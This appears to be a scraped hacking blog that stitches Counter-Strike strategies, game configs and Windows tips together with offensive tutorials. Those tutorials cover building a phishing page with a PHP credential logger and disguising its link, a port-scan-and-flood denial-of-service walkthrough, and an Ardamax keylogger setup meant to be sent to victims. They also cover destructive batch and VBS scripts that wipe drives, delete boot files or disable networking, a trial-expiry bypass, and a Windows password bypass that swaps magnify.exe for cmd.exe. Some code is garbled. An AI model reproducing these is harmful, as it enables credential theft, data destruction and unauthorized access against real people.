Counter-Terrorist (CT) Side:
Pistol Round #1: 2 banana site, 3 stay back in main site.
Pistol Round #2: 2 play very aggressive at banana at start of the round. If the Ts don't look to be coming banana, the 2 can either push down banana or your team can leave 1 spotting down banana while 1 falls back to main site. The other 3 stay back in main site.
Gun Round Setup #1: 1 trying to spot down banana with awp, 1 going banana then back to main site if Ts don't rush it, 1 in apartment or in site watching apartment, 1 left middle, 1 right middle.
Gun Round Setup #2: 2 at banana, 1 in apartment or in site watching apartment, 1 left middle, 1 right middle.
Gun Round Setup #3: 2 at banana, 1 watching apartment from in site, 2 right middle (side farthest from apartment).
Terrorist (T) Side:
Player1: AK
Player2: AK
Player3: AWP
Player4: AK
Player5: AK
T side:
First Round T side:
Buys:Player1 buys 2 flashes, nade or smoke
Player2 buys 2 flashes, smoke
Player3 buys armor
Player4 buys armor
Player5 buys 2 flashes, smoke or nade
*Wait a few seconds in case of nade stack.
*Player2, Player3, Player1 move up banana as quietly as possible. WATCH FOR PUSHED UP CTS.
*Player3 stays at stairs watching up mid.
*Player5 goes alt-middle and then lays down smoke and then flashes mid.
*Player2 lays down smoke cutting off CT spawn from banana bomb site.
*Player4 moves up to help at banana.
*Flash Banana site and then Players 1-4 take the site. Player5 watches the flank unless the rest of the team needs help.
*Plant and cover bomb.
Banana strat: (Player2 has bomb)
*Player3 tries to quick pick banana(spawn dependent) with the awp.
*Player2, Player1, Player3 then move up banana as quietly as possible.
*Player4 watches mid.
*Player5 watches apartment and alt-mid area.
*Player2 lays down smoke cutting off CT spawn from banana bombsite.
*Player1 flashes.
*Sit back and wait for CTs to flash/nade back.
*Player5 distracts at main site with smokes/flashes at middle.
*Player4 moves to banana.
*Player1 lays down his smoke in the same place Player2 did cutting off CT spawn from banana site.
*Unload flashes, and take the site.
*Player5 watches the flank unless the rest of the team needs help.
*Plant bomb and cover bomb.
Banana FAKE strat: (Player2 has bomb)
*Player3 tries to quick pick banana with the awp.
*Player2, Player1, Player3 move up banana as quietly as possible.
*Player4 watches middle.
*Player5 watches apartment and alt-middle.
*Player2 lays down smoke cutting off CT spawn from banana.
*Player1 flashes into banana site.
*Sit back and wait for CTs to flash/nade back.
*Player5 distracts at main site with smokes flashes mid.
*Player1 lays down his smoke in the same place Player2 did blocking CT spawn from banana site.
*Player1, Player2, Player3 Unload flashes, then fall back to main site.
*The whole team will fall back banana then come middle and take the main site, except Player5 who goes apartment.
*Plant bomb and cover bomb.
Banana Split: (Player5 has bomb)
*Player3, Player5 go banana. Try for quick pick, then wait quietly.
*Player4 watches CT window room(alt-mid) from balcony of the apartment building.
*Player2, Player1 move up under the CT window room in alt-middle.
*Player2 throws a small fake by flashing mid, smoking mid, then falling back to a save place.
*Wait for CT counterflashes at mid.
*Player4 falls down from balcony and moves to under window room.
*Player1 flashes then smokes out right side of middle(side closest to apartment) to block any CTS on right side middle. Player4 also smokes out this side of mid.
*Flash both sides of middle then move up middle to ct spawn to banana.
*When Player2, Player1, Player4 are in CT spawn they call "flash banana".
*Player5 flashes banana site twice.
*All 5 team members converge on banana bomsite and take it together.
*Plant and cover bomb.
Main bomb site strat: (Player4 has bomb)
*Player2 stays at banana/middle area to watch flank.
*Player5 tries to rush apartment and get quick kill there. DON'T rush all the way out the back, just rush into it to see if any CTs push up.
*Player3 watches CT alt-mid window room from balcony.
*Player1, Player4 move up alt-mid under the window.
*Player1 flashes mid, lays down smoke at mid then falls back to a save place.
*Wait for CT flashes/nades.
*Player4 boosts Player1 into CT window room. If you have trouble doing this, give it up after a few tries and Player1 can just go with Player4 and Player3.
*Player3 meets up with Player4 under window room in alt-middle.
*Player4 flashes and smokes out left middle(library side). Player3 also smokes left mid.
*Player4, Player3, flash both sides of mid and push of mid, Player1 pushes out front apartment door, and Player5 delays out of back of apartment.
*Take the main bomb site, plant, and cover bomb.
*Timing is a key to this strat.
Spread Strat: (Player2 has bomb)
*Player3, Player5 work banana.
*Player2 and Player4 can work middle.
*Player1 can work the apartment.
*This is just a spread the team out and get picks strat. If the other team likes to push a lot, this could be a good strat as long as your team is smart enough to sit back and wait for the pushing CTs.
source :counterstrikestrats
Counter Hack Quote Of The Day
Time Stopper is the software which can stop the time for try out version software. When you stop the time you can use your try-out versions forever. When you stop the time of a try-out version using this Time Stopper it works via this Time Stopper. Real time and date run normally on your system. You can use any number of try-out version softwares with this software.
How it Works
1. Open Time Stopper
2. Browse and select .exe of required trial software
3. Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
4. Choose any time
5. Click open software on your selected date
If you wish to create an icon for your modified trial software and do not want to open Time stopper every time then use last button in software to create new icon. open that trial software after that from that newly created icon always otherwise it can expire.
This is 100% free and 100% legal!!
Download
There are quite a few services you can disable from starting automatically.
This would be to speed up your boot time and free resources.
They are only suggestions so I suggestion you read the description of each one when you run Services
and that you turn them off one at a time.
Some possibilities are:
Alerter
Application Management
Clipbook
Fast UserSwitching
Human Interface Devices
Indexing Service
Messenger
Net Logon
NetMeeting
QOS RSVP
Remote Desktop Help Session Manager
Remote Registry
Routing & Remote Access
SSDP Discovery Service
Universal Plug and Play Device Host
Web Client
2.)Cleaning the Prefetch Directory
Windows XP has a new feature called Prefetch. This keeps a shortcut to recently used programs.
However it can fill up with old and obsolete programs.
To clean this periodically go to:
Star / Run / Prefetch
Press Ctrl-A to highlight all the shorcuts
Delete them
Clearing the Page File on Shutdown
Click on the Start button
Go to the Control Panel
Administrative Tools
Local Security Policy
Local Policies
Click on Security Options
Right hand menu - right click on "Shutdown: Clear Virtual Memory Pagefile"
Select "Enable"
Reboot
For regedit users.....
If you want to clear the page file on each shutdown:
Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementClearPageFileAtShutdown
Set the value to 1
3.)No GUI Boot
If you don't need to see the XP boot logo,
Run MSCONFIG
Click on the BOOT.INI tab
Check the box for /NOGUIBOOT
4.)Decreasing Boot Time
Microsoft has made available a program to analyze and decrease the time it takes to boot to Windows XP
The program is called BootVis
Uncompress the file.
Run BOOTVIS.EXE
For a starting point, run Trace / Next Boot + Driver Delays
This will reboot your computer and provide a benchmark
After the reboot, BootVis will take a minute or two to show graphs of your system startup.
Note how much time it takes for your system to load (click on the red vertical line)
Then run Trace / Optimize System
Re-Run the Next Boot + Drive Delays
Note how much the time has decreased
Mine went from approximately 33 to 25 seconds.
5.)Increasing Graphics Performance
By default, Windows XP turns on a lot of shadows, fades, slides etc to menu items.
Most simply slow down their display.
To turn these off selectively:
Right click on the My Computer icon
Select Properties
Click on the Advanced tab
Under Performance, click on the Settings button
To turn them all of, select Adjust for best performance
My preference is to leave them all off except for Show shadows under mouse pointer and Show window contents while dragging
6.)Increasing System Performance
If you have 512 megs or more of memory, you can increase system performance
by having the core system kept in memory.
Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory ManagementDisablePagingExecutive
Set the value to be 1
Reboot the computer
7.)Increasing File System Caching
To increase the amount of memory Windows will locked for I/O operations:
Start Regedit
Go to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management
Edit the key IoPageLockLimit
these all are really working tips . Have Fun
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
Index:
What is a phisher? - 101
Making a T35 Account - 102
Getting Web pages Source Code - 103
Creating Phish File - 104
How to fool people - 105
------------------------
What is a phisher? 101
------------------------
A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.
--------------------------
Making a T35 Account 102
--------------------------
In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).spam.com For example: myspace.spam.com Most likeley, it is taken so add numbers like 08, or 07.
--------------------------------------
Getting Web Pages Source Code 103
--------------------------------------
After you create that page, go to the website you will make a phisher for, I will use KHI ( http://www.forums.khinsider.com ) Make sure you are logged out and and attempt to post a message. You will get an error saying you must log-in. From tehre right-click the page, and click View Source. Copy and paste what has popped-up.
------------------------
Creating Phish File 104
------------------------
Once you have that copied, go to your T35 account. Click on "New File" Title it login.htm Then paste your Source Code you copied from 104. Save it.
Now create another file, title it fhish.php And inside, paste this code:
Code:
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
The http://www.myspace.com is what the page goes to after the victim logs in, change that to what desired
Save the file.
Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!
-------------------------
How to fool people - 105
-------------------------
What you do now is disguise your link. Use this code:
Code:
T35acount.spam.com/login.htm
That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.
Code:
[url=xxx.spam.com]*real website name*.com/login.php[/url]
You do the same for any forum!
Thank you for reading! Hope it helps! If i was missing something, or you have any questions, Mail me
Tools
Port scanner & rDos
http://www.mediafire.com/?sharekey=7fcc5e5c82ff2dcbe62ea590dc5e5dbbe04e75f6e8ebb871
HotSpotSheild Proxy!
http://hotspotshield.com/
Step One: First we need to find the websites IP Adress. This is very easy todo.
Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up
Cmd todo this press Start>Run>cmd Once you have CMD open you type ping
http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST
REMOVE HTTP:// AND ANY /'s)
Step Two: Now we must test to see if port 80 is open (it usually is).
This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you todo a range scan or a full scan (SELECT REANGE SCAN!) It will ask for
conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and
81 for highest hit enter than hit cap Y.
[X] = Closed
[X] Vulnerable = Open
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!
Ok open Up rDos that you download.
Enter your victims ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80
was open! If it is closed it will not work.
Hit enter.. *=Flooding -=Crashed Or didn't connect!
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
GMDesk is an application that lets you run Gmail, Google Calendar, Google Docs and Google Maps as a stand-alone application to do all your mail handling, calendar event reading etc with. No need to open it up in a web browser, or have it clutter your workspace.
Fire up GMDesk, and just alt-tab (on Windows or Linux) or Cmd-tab (on Mac) to shift between this application and the other ones you are running.
GMDesk offers an easy menu as well as keyboard shortcuts to switch between different Google services, and you can specify what default service you want the application to start with. It also supports Google Apps access as well.
Counter-Terrorist (CT) Side:
Pistol Round: 2 B, 2 on SA watching SA, mid, and lower b, 1 watching LA close to bombsite on the ramp.
A set up(3-1-1): 1 LA, 2 SA or platform, 1 b, 1 mid
B set up(SA Open strat): 2 long a, 1 mid, 2 b
C set up(2-1-2 or Strong B): 1 long a, 1 SA, 1 mid, 2 b
Terrorist (T) Side:
Player1: AK
Player2: AK
Player3: AK
Player4: AWP or AK sometimes
Player5: AWP
Pistol Round: Player1, Player2, Player3 Rush LA with flashes/grenades and the bomb. Player4 and Player5 delay up SA trying to flank and get rotators.
Verge Strat: Player5, Player4 pick mid, Player3, Player2, Player1 with AKs rush towards B. If AWPS get a pick take and hold B. If awpers don't get a pick then Player1, Player2, Player5 go SA, Player4 sneaks long, and Player3 watches for rotators in mid/lower b area. Make sure to smoke middle if the team ends up going to A.
Complexity Strat: Player1 goes lower B, Player5 picks mid, 3 team members(Player3, Player2, and Player4) rush and take long. Leave the awper(Player4) in pit at LA, then Player3 and Player2 meet up with Player5 and go up SA and take A. Player1 hangs middle and gets rotators. Make sure to smoke middle if the team ends up going to A.
Spread Strat: Player2, Player3, Player4, Player5 work A both LA and SA, Player1 goes B and try to get picks/rotators.
2-3 Split A: 3 team members(1 awp, 2 AKs) take LA, while other team members smoke mid and come up SA. Plant A and cover bomb. Make sure to lay 2-3 smokes when crossing from LA to site.
Note: You can also do full team rushes as well such as a B rush, B tunnels to mid rush, SA rush, or LA rush. These usually don't work that well against good teams though. I would advice using these on save rounds, deagle rounds, or on a team in which you know is weak at a certain position on the map.
Common Map Locations
Long A: This is the route to A bombsite going right out of T spawn and then threw the small tunnel with doors.
Short A: This is the route to A bombsite going up middle out of spawn and then going up stairs into A bombsite. This is also known as cat or catwalk.
Upper B: This is the part of the tunnels outside of B that connects to the B bomb site.
Lower B: This is the part of the tunnels outside of B that connects to middle.
Pit: This is the declined ramp at long A.
source:counterstrikestrats
Regards
SILENT||AGGRESSION
Keylogers basically store all key strokes(could be password or anything typed)
Step 1 : Download Ardamax Keylogger
Tutorial :
1) Now install this after installing you will find adramax icon in tray icons list
2) Right click on that icon and select register with a key
registration name is
forumw
and registration serial is
JUTSORHVSCQQGUF
3) Now right click and choose REMOTE INSTALLATION
4) A wizard will comeup .. press next for 4 times
5) then it will ask for updates , uncheck it
6) Now click next , now give the self destruction date to next 3-2 months
7) Now they will ask that send logs every : choose every 5 minutes
8) deleivery method select it as email
9) now click next now send to give here your own email id
10) smtp host-->press find
11) Username : give anything as username and password now do next for 4 times ..
12) You will get a message saying - : deplosive package made successfully
13) Your htv.exe file will apear ..
Send this file to the victim as soon as he double clicks it, you will get his keystrokes in every 5 mins in email id provided ..
they may come in spam / junk ....... Happy hacking
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
Warning : Please Use ALL At Your Own Risk.Never Try On Your Own Pc
Let Your Enemy See Your Power
Now below i am posting some codes which are known as "Deadly"
All Scripts Here Are To Be Copied In NotePad
#1.This Will Delete All The Content Of A Drive
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code As Anything.bat
#2.This Will Just Restart Your Pc
@echo off
shutdown -r -f -t 00
Save The Above Code As Anything.bat
#3.This Will Crash Ur Computer
.
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
.
Save It As Anything.vbs
It Only Works With Windows XP
#4.
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat
.
Save It As Anything.bat
No Idea About The After Effects OF This Virus
#5.The Most Simple Virus To Crush The Window
.
@Echo off
Del C:\ *.* |y
.
Save It As Anything.bat
#6.This will crash ur computer
: loop
start cmd.exe
goto loop
.
Save As Anything.bat
#7.Script that crashes pc
.
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
.
Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!
#8.Shutdowns Computer Everytime It Is Turned On
.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
#9.Disable Internet Permanently
.
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE
#10.Change Files To Non-working TXT Files
.
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Gmail
1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is
65.119.112.245.
That is the IP address of the sender!
5. Track the IP address of the sender
Finding IP address in Yahoo! Mail
1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender!
6. Track the IP address of the sender
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
Accomplish your objective to force the other team to make a move
Often the other team will be either camping, or moving cautiously, or waiting for you to make a move. Particularly when the round is drawing to a close and there are only a few surviving players left, you can try and turn the tide of battle by putting your enemies on the defensive. If you're a Counter-Terrorist on a hostage rescue map, go grab the remaining hostage and make a run for it. If you're a Terrorist on a bomb/defuse map, try planting the bomb in order to force your enemies out. And so on. If done carefully, this can often turn the hunter into the hunted, since now you will be taking the initiative and forcing your enemies into predictable, sometimes exposed, behavior (chasing after the hostages and their rescuer, defusing the bomb, etc.). If you're being hunted, try flipping the script.
Leave gratings and vents intact when possible
Untouched windows and vents serve as an early warning system. It takes noise to open a vent or grating -- not much if a knife is used, but enough to to be noticed if it's nearby -- and this can alert you to sneaking enemies even when they're not direct line of sight. Even for vents and destructible objects far away, seeing them destroyed -- or noticing later that they're destroyed -- can give you a heads-up as to enemy locations, provided you know your team isn't shooting at them. If you hold off on destroying vents and gratings, you'll know that when they're gone an enemy was responsible.
Don't hesitate to sacrifice yourself for the team
The goal of Counter-Strike is for your team to win, not just you. To be a successful Counter-Strike player, you need to put your team above yourself -- and that means your team, not whatever clan you're in this week. To accomplish your objective, that sometimes means laying down your life for the good of the team. When your teammate is planting a bomb, you need to put yourself between him and the enemy. When the VIP is making a hasty retreat, don't hesitate to try to lead the enemy astray by moving out of cover and drawing fire while he can escape. When your teammate is making a run with the hostages trailing behind him, step in the line of fire to give the enemy multiple targets. Your team always comes first.
Take out snipers first
Snipers -- enemy on high ground and watching over your advance, whether they're actually using sniper weapons or not -- are your primary concern. When you're on the offensive, competent snipers are the main impediment to achieving your objective. Give the highest priority to taking out the snipers; once they're gone you can continue on. Snipers are your biggest threat when advancing. Eliminate them first.
When low on ammo and enemy is nearby, pick up enemy gun
When you're in the thick of things, often successfully reloading before you come across another enemy is the primary impediment to your success. When you've just downed an enemy -- particularly if you caught him unaware so he did not return much fire -- and you need to reload but other enemies are nearby, consider picking up the downed enemy's weapon. Obviously, this is a particularly good idea if his weapon is superior to your own. If your enemies are hunting you, they may wait until right after a firefight to make their move, figuring that you're probably distracted or low on ammo or reloading. Being fully prepared with a fully-loaded weapon can give you the upper hand. If you're low on ammo, consider picking up weapons from your downed foes.
When sniping, relocate after being spotted
Snipers are deadly in any realistic game like Counter-Strike -- running out into open without cover is tantamount to suicide. But by the same token, an uncareful sniper can easily be taken down by an enemy sniper, or even an assaulting foe with an accurate weapon (like an AK47 or a Colt) and good aim. If you're sniping, once you're spotted, relocate to another position. It doesn't necessarily have to be far away, your head just needs to be poking out of another area. If you're firing at another sniper who doesn't yet see you and miss, he shortly will -- move to another position and resume the attack. A sniper in a known location is a soon-to-be-dead sniper.
If the round ends and you survive, avoid enemy contact
If the round ends by something other than elimination -- i.e., the Counter-Terrorists rescue all the hostages or the Terrorists successfully destroy the bomb site -- then avoid enemy contact. At this point it does you no good to engage the enemy: The round is already over and you only risk getting killed. Part of Counter-Strike is managing your money, and risking losing your current weapon is not worth it when the round is already over. It doesn't do you any good to engage the enemy once the round is over.
If you find yourself isolated and outmatched, concentrate on taking out one enemy
Every Counter-Strike player has found themselves out on point and has accidentally stumbled into the spearhead of an enemy assault. When you have no choice but to die, take someone out with you. Instead of spraying bullets at the entire general area, hoping to whittle all of the opponents down, concentrate on one individual and inflict all your might upon him before you get taken down. Your remaining teammates will be better off with one fewer enemy rather than that same amount of damage spread over each enemy. If you find yourself being overrun and are certain to die, concentrate on taking one enemy with you, to help out your teammates down the line.
source:bosskey
Regards
SILENT||AGGRESSION
Try to boot from windows vista dvd or if u have oem computer go to repair options !!
Boot to Win RE
Click Command Prompt option.
Type the following command:
C:
CD Windows\system32
ren cmd.exe cmd.old
ren magnify.exe cmd.exe
ren cmd.old magnify.exe
Restart computer
Click on Easy of Access centre left side bottom à Choose Magnify option à Command prompt opens up
Type: net user administrator /active:yes
Restart the computer
Logon on administrator account and then using User Account page, remove password for the other account
Search for Magnify.exe in start search and click on it
Command prompt opens up
Type: net user administrator /active:no
Restart the computer
This will disable the administrator account.
Boot to winRE
Type the following:
C:
CD Windows\system32
ren magnify.exe cmd.old
ren cmd.exe magnify.exe
ren cmd.old cmd.exe
exit
Restart the computer – system logs on to the User account without asking for password provided there is only one user account.
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
Using this method, a user can shutdown, restart, hibernate, etc. his or her computer, just by sending an email from his or her phone.
To do this, all you will need is Microsoft Outlook which should come with Microsoft Office, which most people have. This will need to be on the computer wish you wish to shutdown.
So, this is how you do this:
1. First, you need the batch files to perform the Shutdown, Hibernate etc. You can write them down yourselves
2. open your note pad
and write lik this...
c:\windows\system32\shutdown -s -f -t 00
and save it as shutdown.bat
3. Open up Microsoft Outlook. Make sure that you have already configured it for your email.Now we will need to make it so that Outlook checks your inbox about every minute (1 minute for testing time can be increased if a delayed shutdown is desired). You can do this by going to Tools: Options.
4. Then click the Mail Setup tab, and afterwards, the Send/Receive button.
5. Make sure that the Schedule an automatic send/receive every... box is checked, and set the number of minutes to 1. Now you may close all of these dialog boxes.
6. Now go to Tools: Rules and Alerts... Next click the options button in the upper right hand corner and press the Import Rules button.
7. Now select the shutdown.bat file ...whi u hv created ...
8. Now, when you send a message from your phone to your e-mail address with the subject shutdown or smsshutdown%%, your computer will shutdown.
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
It forms a New Drive at My Computer just like C: drive, and you can directly Login from here to your Personal Gmail Account without going to Any Browser and you don't need to wait long time to Upload stuff in there.. but you just have to copy and paste it over there..like you do in other drives
and Yeah!! its uploaded on your Gmail account Instantly.
So technically it acts a 7 GB flash drive extension where you can upload any stuff and access it anywhere for free..
Some More info about it :
GMail Drive is a Shell Name space Extension that creates a virtual drive in the Windows Explorer, allowing you to use your Google Gmail account as a storage medium.
It allows you to do basic file manipulation, such as copy and delete of files inside the Gmail account. Because it is a Shell Extension, the interface you work in is Windows Explorer itself.
GMail Drive appears as a virtual drive under your My Computer folder in Windows
Explorer
Please note that GMail Drive is still an experimental tool. There's still a number of limitations of the file-system (such as total filename size must be less than 65 characters). Since the tool hooks up with the free Gmail Service provided by Google, changes in the Gmail system may break the tool's ability to function. I cannot guarantee that files stored in this manner will be accessible in the future.
Download Free :
GMail Drive v1.0.14 - download site #1 (Softpedia)
GMail Drive v1.0.14 - download site #2 (Betanews)
Regards
●๋●н•-------●2•--------●k•-------●2●๋•
нαck τнε нαckεг kгαck τнε kгαckεг
Here is a great config to help improve your FPS for counter-strike source.
Guide for Installation:
1. Copy the following text and a text file and rename this file to "autoexec.cfg"
2. Place this file in the "c:\program files\valve\steam\steamapps\\counter-strike source\cstrike\cfg" directory
3. Upon running Counter-Strike: Source, your console should note: "FPS Config Loaded" in your console.
If you do not see this in your console (~), please make sure the file is correctly named "autoexec.cfg" and is placed in the correct folder.
This config is both CAL and CEVO legal. Besides running this config, closing any unneeded programs, regularly defragging your hard disk, and running spyware cleaners will help the game run smoother.
//FPS Config
//----------------------
clear
echo "*******************"
echo "FPS Config Loaded"
echo "*******************"
// FPS Settings
// ----------------
//Cl_ Commands
cl_cmdrate "101" // Must be set to 100/101
cl_drawmonitors "0"
cl_ejectbrass "0"
cl_forcepreload "1"
cl_interp "0.01" // Must be set to .01
cl_interpolate "1" // Must be set to 1
cl_lagcomp_errorcheck "1"
cl_lagcompensation "1"
cl_minmodels "1"
cl_min_ct "1"
cl_min_t "1"
cl_predictweapons "1"
cl_pred_optimize "2"
cl_phys_props_max "50" // Must be set to 50+
cl_ragdoll_physics_enable "0"
cl_ragdoll_collide "0"
cl_smooth "1"
cl_smoothtime "0.01"
cl_soundscape_flush
cl_updaterate "101" // Must be set to 100/101
//Mat_ commands
mat_bloomamount_rate "0.05f" // Must be set to "0.05f"
mat_bloomscale "0"
mat_bumpbasis "0" // Must be set to 0
mat_bumpmap "0"
mat_clipz "1"
mat_colorcorrection "0"
mat_compressedtextures "1"
mat_debug_autoexposure "0" // Must be set to 0
mat_debug_bloom "0" // Must be set to 0
mat_debug_postprocessing_effects "0" // Must be set to 0
mat_debug_process_halfscreen "0" // Must be set to 0
mat_debugalttab "0" // Must be set to 0
mat_debugdepth "0" // Must be set to 0
mat_debugdepthmode "0" // Must be set to 0
mat_debugdepthval "128" // Must be set to 128
mat_debugdepthvalmax "256" // Must be set to 256
mat_disable_bloom "1"
//mat_dxlevel 90 // Must be set to 81 or higher
mat_filterlightmaps "1"
mat_force_bloom "0" // Must be set to 0
mat_forcehardwaresync "0"
mat_hdr_enabled "0"
mat_hdroverbrightrange "16" // Must be set to 16
mat_leafvis "0" // Must be set to 0
mat_norendering "0" // Must be set to 0
mat_parallaxmap "0"
mat_picmip "0" // Must not be higher than 2
mat_reducefillrate "1"
mat_showlightmappage "-1" // Must be set to -1
mat_specular "0"
mat_surfaceid "0" // Must be set to 0
mat_surfacemat "0" // Must be set to 0
mat_vsync "0"
//R_ Commands
r_ambientfraction "0.1" // Must be set to .1
r_avglight "1" // Must be set to 1
r_decals "0"
r_decal_cullsize "0"
r_dopixelvisibility "0"
r_drawbatchdecals "0"
r_drawdetailprops "1" // Must be set to 1
r_drawflecks "0"
r_drawmodeldecals "0"
r_dynamic "0"
r_eyes "0"
r_flex "0"
r_lightaverage "1" // Must be set to 1
r_lod "-1" // Must be set to -1/0/1/2
r_maxdlights "32" // Must be set to 32
r_modellodscale "1" // Must be set to 1
r_occlusion "1"
r_renderoverlayfragment "0"
r_rootlod "2" // Must be set to 0/1/2
r_shadows "1"
r_shadowmaxrendered "1"
r_shadowrendertotexture "1"
r_teeth "0"
r_waterforceexpensive "0"
r_waterdrawreflection "0"
r_worldlights "2" // Must be set to 2
r_worldlightmin "0.0002" // Must be set to .0002
r_3dnow "1"
r_mmx "1"
r_sse "1"
r_sse2 "1"
r_3dsky 0
//Rope_
rope_averagelight "0"
rope_collide "0"
rope_shake "0"
rope_smooth "0"
rope_smooth_minwidth "0"
rope_smooth_minalpha "0"
rope_smooth_maxalphawidth "0"
rope_smooth_maxalpha "0"
rope_smooth_enlarge "0"
rope_subdiv "0"
rope_wind_dist "0.01"
//Miscellaneous
demo_recordcommands "1" // Must be set to 1
//fps_max "100"
func_break_max_pieces "0"
gl_clear "0"
jpeg_quality "100" // Must be set to 100
mp_decals "0"
net_showevents "0" // Must be set to 0
props_break_max_pieces "0"
props_break_max_pieces_perframe "0"
rate "25000" // Must be set to 25000+
snd_flushasync
texture_budget_background_alpha "999
texture_budget_panel_height "0"
texture_budget_panel_width "0"
voice_enable "1"
voice_scale "1"
voice_modenable "1"
violence_agibs "1"
violence_hgibs "1"
violence_hblood "1"
violence_ablood "1"
//zoom_sensitivity_ratio "1"
//BUY BINDS
//-----
//KP_ is the prefix for KeyPad buttons
//You may add multiple buy commands to one key
